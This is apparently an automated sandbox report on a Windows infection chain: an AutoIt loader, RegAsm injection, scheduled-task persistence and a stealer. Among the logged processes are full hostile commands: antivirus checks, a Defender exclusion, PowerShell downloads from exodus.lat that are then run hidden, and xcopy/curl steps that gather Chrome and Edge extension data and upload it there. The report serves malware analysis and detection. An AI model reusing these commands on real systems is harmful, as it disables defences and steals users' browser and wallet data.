                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98111
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97953
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97823
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97500
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97265
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97156
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97040
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96922
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96812
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96702
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96593
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96484
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96374
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96265
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96156
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96046
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95937
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95828
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95718
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95603
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95484
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95375
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95265
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95156
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95046
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94934
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94827
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94602
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94484
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94369
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94259
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94147
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94031
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 93921
                                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\491505\
                                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
                                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
                                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
                                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\491505
                                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
                                  Source: RegAsm.exe, 00000016.00000002.4635504009.0000000005664000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com Process information queried: ProcessInformation
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr Code function: 18_2_006A45D5 BlockInput,18_2_006A45D5
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr Code function: 18_2_00645240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,18_2_00645240
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr Code function: 18_2_00665CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,18_2_00665CAC
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr Code function: 18_2_006888CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,18_2_006888CD
                                  Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe Process token adjusted: Debug
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_0065A354 SetUnhandledExceptionFilter | 18_2_0065A354
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_0065A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter | 18_2_0065A385
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: amsi32_6596.amsi.csv, type: OTHER
Source: Yara match | File source: amsi32_7160.amsi.csv, type: OTHER
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6884, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\download.bat, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\checkmiexe.bat, type: DROPPED
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Memory written: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe base: 7C0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Memory written: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe base: 7C0000
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Memory written: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe base: 405000
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00689369 LogonUserW | 18_2_00689369
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00645240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW | 18_2_00645240
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00691AC6 SendInput,keybd_event | 18_2_00691AC6
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_006951E2 mouse_event | 18_2_006951E2
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 491505
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\491505\Dr.com Dr.com B
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Process created: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr" "C:\Users\user\AppData\Local\CreativePixel Tech\E"
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\download.bat" "
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\checkmiexe.bat" "
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runsteal.bat" "
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Process created: C:\Users\user\AppData\Local\Temp\smartscreen.exe "C:\Users\user\AppData\Local\Temp\smartscreen.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net session
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 session
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net session
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c "C:\Users\user\AppData\Local\Temp\downloaded_script.bat"
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 session
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\xcopy.exe xcopy /E /I "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\xcopy.exe xcopy /E /I "C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Edge\"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip'"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\asm\COMSurrogate.exe "C:\Users\user\AppData\Local\asm\COMSurrogate.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -s https://api.ipify.org
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php"
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_006888CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity | 18_2_006888CD
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00694F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid | 18_2_00694F1C
Source: Dr.com, 0000000A.00000003.2164317237.00000000038D7000.00000004.00000800.00020000.00000000.sdmp, Dr.com, 0000000A.00000000.2139847263.0000000000DB6000.00000002.00000001.01000000.00000007.sdmp, ApolloPro.scr, 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: ApolloPro.scr | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_0065885B cpuid | 18_2_0065885B
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe Queries volume information: C:\Users\user\AppData\Local\Temp\smartscreen.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
